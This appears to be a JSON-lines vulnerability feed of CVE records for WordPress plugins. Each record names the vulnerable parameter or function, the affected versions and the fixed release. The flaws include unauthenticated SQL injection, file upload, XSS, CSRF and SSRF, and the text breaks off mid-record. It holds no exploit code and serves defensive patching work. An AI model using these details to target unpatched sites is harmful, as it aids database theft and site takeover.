{"CVE_ID":"CVE-2024-13532","slug":"small-package-quotes-purolator-edition","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The Small Package Quotes \u2013 Purolator Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-purolator-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-purolator-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L237\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-purolator-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L346\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/small-package-quotes-purolator-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L346\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/813fe9d2-913c-4e04-bcb7-443eef95c62e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/813fe9d2-913c-4e04-bcb7-443eef95c62e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4033","slug":"all-in-one-video-gallery","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The All-in-One Video Gallery plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the aiovg_create_attachment_from_external_image_url function in all versions up to, and including, 3.6.4. This makes it possible for authenticated attackers, with contributor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0f295f9-1090-4b10-abc5-3f73c5b4e28d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0f295f9-1090-4b10-abc5-3f73c5b4e28d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-video-gallery\\\/trunk\\\/includes\\\/functions.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-video-gallery\\\/trunk\\\/includes\\\/functions.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078876%40all-in-one-video-gallery%2Ftrunk&old=3072329%40all-in-one-video-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078876%40all-in-one-video-gallery%2Ftrunk&old=3072329%40all-in-one-video-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13478","slug":"ltl-freight-quotes-ups-edition","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The LTL Freight Quotes \u2013 TForce Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242156%40ltl-freight-quotes-ups-edition&new=3242156%40ltl-freight-quotes-ups-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242156%40ltl-freight-quotes-ups-edition&new=3242156%40ltl-freight-quotes-ups-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2403dd59-7b9e-490e-86d8-5a10f9eee616?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2403dd59-7b9e-490e-86d8-5a10f9eee616?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4664","slug":"wp-whatsapp","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The WP Chat App WordPress plugin before 3.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admins to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46ada0b4-f3cd-44fb-a568-3345e639bdb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46ada0b4-f3cd-44fb-a568-3345e639bdb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11730","slug":"kivicare-clinic-management-system","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'sort[]' parameter of the static_data_list AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with doctor\/receptionist-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCStaticDataController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCStaticDataController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30f2a3ee-7f95-478c-b3d7-c254b9472d42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30f2a3ee-7f95-478c-b3d7-c254b9472d42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11729","slug":"kivicare-clinic-management-system","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'service_list[0][service_id]' parameter of the get_widget_payment_options AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCBookAppointmentWidgetController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCBookAppointmentWidgetController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86632212-37b5-4280-8a2a-163957ad9787?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86632212-37b5-4280-8a2a-163957ad9787?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11728","slug":"kivicare-clinic-management-system","versionImpact":"3.6.4","versionEndExcluding":"3.6.5","description":"The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCTaxController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201428\\\/kivicare-clinic-management-system\\\/trunk\\\/app\\\/controllers\\\/KCTaxController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53c18834-3026-4d4d-888b-add314a0e56e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53c18834-3026-4d4d-888b-add314a0e56e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3194","slug":"dokan-lite","versionImpact":"3.6.3","versionEndExcluding":"3.6.4","description":"The Dokan WordPress plugin before 3.6.4 allows vendors to inject arbitrary javascript in product reviews, which may allow them to run stored XSS attacks against other users like site administrators.","recommendation":"Update to version 3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85e32913-dc2a-44c9-addd-7abde618e995\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85e32913-dc2a-44c9-addd-7abde618e995\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39545","slug":"wp-rest-api-authentication","versionImpact":"3.6.3","versionEndExcluding":"3.6.4","description":"Missing Authorization vulnerability in miniOrange WordPress REST API Authentication allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress REST API Authentication: from n\/a through 3.6.3.","recommendation":"Update to version 3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-rest-api-authentication\\\/vulnerability\\\/wordpress-wordpress-rest-api-authentication-3-6-3-settings-change-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-rest-api-authentication\\\/vulnerability\\\/wordpress-wordpress-rest-api-authentication-3-6-3-settings-change-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2326","slug":"pretty-link","versionImpact":"3.6.3","versionEndExcluding":"3.6.4","description":"The Pretty Links \u2013 Affiliate Links, Link Branding, Link Tracking & Marketing Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.3. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's configuration including stripe integration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97d78b4b-568e-43e7-bebf-091179c321f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97d78b4b-568e-43e7-bebf-091179c321f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049386%40pretty-link&new=3049386%40pretty-link&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049386%40pretty-link&new=3049386%40pretty-link&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2906","slug":"ct-real-estate-core","versionImpact":"3.6.3","versionEndExcluding":"3.6.4","description":"The Contempo Real Estate Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/contempothemes.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/contempothemes.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme\\\/12473778\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme\\\/12473778\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39c651c3-a478-4f58-af51-fd73d2934bdf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39c651c3-a478-4f58-af51-fd73d2934bdf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5530","slug":"UNKNOWN-CVE-2023-5530-1","versionImpact":"3.6.33","versionEndExcluding":"3.6.34","description":"The Ninja Forms Contact Form WordPress plugin before 3.6.34 does not sanitize and escape its label fields, which could allow high privilege users such as admin to perform Stored XSS attacks. Only users with the unfiltered_html capability can perform this, and such users are already allowed to use JS in posts\/comments etc however the vendor acknowledged and fixed the issue","recommendation":"Update to version 3.6.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a642f313-cc3e-4d75-b207-1dceb6a7fbae\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a642f313-cc3e-4d75-b207-1dceb6a7fbae\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ninjaforms.com\\\/blog\\\/saturday-drive-x-edition\\\/\",\"name\":\"https:\\\/\\\/ninjaforms.com\\\/blog\\\/saturday-drive-x-edition\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4404","slug":"elementskit","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The ElementsKit PRO plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.6.2 via the 'render_raw' function. This can allow authenticated attackers, with contributor-level permissions and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6417269d-3d49-4f33-b92a-5aacb052bab0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6417269d-3d49-4f33-b92a-5aacb052bab0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0369","slug":"jet-engine","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The JetEngine plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018list_tag\u2019 parameter in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/crocoblock.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetengine\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetengine\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f27979a8-0e68-4a45-9e3e-3667d88361d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f27979a8-0e68-4a45-9e3e-3667d88361d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12416","slug":"woomotiv","versionImpact":"3.6.1","versionEndExcluding":"3.6.3","description":"The Live Sales Notification for Woocommerce \u2013 Woomotiv plugin for WordPress is vulnerable to SQL Injection via the 'woomotiv_seen_products_.*' cookie in all versions up to, and including, 3.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#693\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#693\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#L521\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#L521\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#L614\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woomotiv\\\/trunk\\\/lib\\\/functions.php#L614\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82016921-4efb-47b4-9a75-45cae4ad80f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82016921-4efb-47b4-9a75-45cae4ad80f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0612","slug":"content-views-query-and-display-post-page","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The Content Views \u2013 Post Grid, Slider, Accordion (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024861\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3024861\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4593","slug":"wp-register-profile-with-shortcode","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The WP Register Profile With Shortcode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.2 via the 'rp_user_data' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data from user meta like hashed passwords, usernames, and more.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3324309%40wp-register-profile-with-shortcode&new=3324309%40wp-register-profile-with-shortcode&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3324309%40wp-register-profile-with-shortcode&new=3324309%40wp-register-profile-with-shortcode&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ae7f5e3-7312-4fee-962b-3aecd8432557?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ae7f5e3-7312-4fee-962b-3aecd8432557?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5263","slug":"elementskit","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Motion Text and Table widgets in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e718554-1096-4a16-968d-f00b65e1361d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e718554-1096-4a16-968d-f00b65e1361d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/roadmaps\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0334","slug":"shortpixel-adaptive-images","versionEndExcluding":"3.6.3","description":"The ShortPixel Adaptive Images WordPress plugin before 3.6.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b027a8db-0fd6-444d-b14a-0ae58f04f931\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b027a8db-0fd6-444d-b14a-0ae58f04f931\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4960","slug":"wc-multivendor-marketplace","versionImpact":"3.6.2","versionEndExcluding":"3.6.3","description":"The WCFM Marketplace plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wcfm_stores' shortcode in versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f99e9f01-cc98-4af5-bb95-f56f6a550e96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f99e9f01-cc98-4af5-bb95-f56f6a550e96?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-marketplace\\\/tags\\\/3.6.1\\\/views\\\/store-lists\\\/wcfmmp-view-store-lists.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-marketplace\\\/tags\\\/3.6.1\\\/views\\\/store-lists\\\/wcfmmp-view-store-lists.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-marketplace\\\/tags\\\/3.6.1\\\/core\\\/class-wcfmmp-shortcode.php#L241\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-multivendor-marketplace\\\/tags\\\/3.6.1\\\/core\\\/class-wcfmmp-shortcode.php#L241\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3000763\\\/wc-multivendor-marketplace#file999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3000763\\\/wc-multivendor-marketplace#file999\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4109","slug":"ninja-forms","versionEndExcluding":"3.6.26","description":"The Ninja Forms WordPress Ninja Forms Contact Form WordPress plugin before 3.6.26 was affected by a HTML Injection security vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/558e06ab-704b-4bb1-ba7f-b5f6bbbd68d9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/558e06ab-704b-4bb1-ba7f-b5f6bbbd68d9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1835","slug":"ninja-forms","versionEndExcluding":"3.6.22","description":"The Ninja Forms Contact Form WordPress plugin before 3.6.22 does not properly escape user input before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5fc223c-5ec0-44b2-b2f6-b35f9942d341\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5fc223c-5ec0-44b2-b2f6-b35f9942d341\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4452","slug":"elementskit","versionImpact":"3.6.1","versionEndExcluding":"3.6.2","description":"The ElementsKit Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/488ac848-786e-4100-a387-5a40e8fc4175?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/488ac848-786e-4100-a387-5a40e8fc4175?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"name\":\"https:\\\/\\\/wpmet.com\\\/plugin\\\/elementskit\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11707","slug":"my-auctions-allegro-free-edition","versionImpact":"3.6.17","versionEndExcluding":"3.6.18","description":"The My auctions allegro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.6.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.6.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197924%40my-auctions-allegro-free-edition&new=3197924%40my-auctions-allegro-free-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197924%40my-auctions-allegro-free-edition&new=3197924%40my-auctions-allegro-free-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198824%40my-auctions-allegro-free-edition&new=3198824%40my-auctions-allegro-free-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198824%40my-auctions-allegro-free-edition&new=3198824%40my-auctions-allegro-free-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57a78696-5892-4621-992f-5e4a7d8fa965?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57a78696-5892-4621-992f-